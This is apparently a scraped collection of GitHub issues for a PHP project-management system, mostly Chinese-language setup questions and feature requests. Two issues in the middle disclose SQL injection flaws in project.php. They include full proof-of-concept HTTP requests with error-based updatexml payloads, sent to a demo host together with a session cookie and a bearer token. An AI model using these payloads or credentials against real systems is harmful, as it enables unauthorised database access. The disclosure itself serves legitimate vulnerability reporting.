环境 php7.2
绑定钉钉账号时, 报错

Login to demo account

In line 242 of the selfList method in the project.php file, pass the controllable request parameters memberCode and organizationCode into the getMemberProjects function, and the memberCode must be legal and exist in the database.

The SQL statement in the getMemberProjects function is directly spliced with the organizationCode parameter, causing the SQL statement to be closed, and then the malicious, closed SQL statement will enter the query method for execution, and the attacker can use it to obtain data

POC:
POST /index.php/project/project/selfList HTTP/2
Host: beta.vilson.xyz
Cookie: se0d06741=5rkiv0sqvn1otra27va1jlfgfo
Content-Length: 168
Sec-Ch-Ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"
Organizationcode: 6v7be19pwman2fird04gqu53
Sec-Ch-Ua-Mobile: ?0
Authorization: bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiIiLCJhdWQiOiIiLCJpYXQiOjE2NzY5NDU0MTAsIm5iZiI6MTY3Njk0NTQxMCwiZGF0YSI6eyJjb2RlIjoiNnY3YmUxOXB3bWFuMmZpcmQwNGdxdTUzIn0sInNjb3BlcyI6ImFjY2VzcyIsImV4cCI6MTY3NzU1MDIxMH0.G18ME7UI0EHAxaTSV751smgNfETb1Q0O0e9mv-6L42I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/plain, /
Sec-Ch-Ua-Platform: "macOS"
Origin: https://beta.vilson.xyz
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://beta.vilson.xyz/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

delete=0&all=0&page=1&pageSize=20&organizationCode=6v7be19pwman2fird04gqu53'+and+updatexml(1,concat(0x7e,(select+user()),0x7e),1)%23&memberCode=6v7be19pwman2fird04gqu53

Screenshot of a successful attack:

In line 377 of the getLogBySelfProject method in project.php, when the projectCode parameter is not empty, the projectCode parameter is directly spliced into the SQL statement, causing the attacker to close and splice the SQL statement for SQL injection

Login to demo account

POC：

POST /index.php/project/project/getLogBySelfProject HTTP/2
Host: beta.vilson.xyz
Cookie: se0d06741=5rkiv0sqvn1otra27va1jlfgfo
Content-Length: 100
Sec-Ch-Ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"
Organizationcode: 6v7be19pwman2fird04gqu53
Sec-Ch-Ua-Mobile: ?0
Authorization: bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiIiLCJhdWQiOiIiLCJpYXQiOjE2NzY5NDU0MTAsIm5iZiI6MTY3Njk0NTQxMCwiZGF0YSI6eyJjb2RlIjoiNnY3YmUxOXB3bWFuMmZpcmQwNGdxdTUzIn0sInNjb3BlcyI6ImFjY2VzcyIsImV4cCI6MTY3NzU1MDIxMH0.G18ME7UI0EHAxaTSV751smgNfETb1Q0O0e9mv-6L42I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/plain, /
Sec-Ch-Ua-Platform: "macOS"
Origin: https://beta.vilson.xyz
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://beta.vilson.xyz/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

page=1&pageSize=123&projectCode=121312312312'+or+updatexml(1,concat(0x7e,(select+user()),0x7e),1)%23

Screenshot of a successful attack

开源的没有甘特图

访问http://localhost/pearProjectApi/public时出现下面错误：
[0] HttpException in Module.php line 63
模块不存在:pearprojectapi

后续会增加飞书的支持吗?

并没有找到ldata下的lock文件，改怎么处理

考虑出个simple版的吗 不带业务逻辑的 基础框架+权限+ 菜单

系统:ubuntu 18.04
composer : 1.9

发现最新版本对语法要求更严格了，降低版本就行了。
composer/composer#8411

如题？

请增加docker支持，谢谢

根据项目统计、根据版本统计等

composer install 提示需要php7.2，可文档说>=7.0就好了。这个要如何是好？

我想要安装但是运行后就直接是登录界面了，我什么都还没设置，请问怎么解决？data目录下也没有install.lcok

谢谢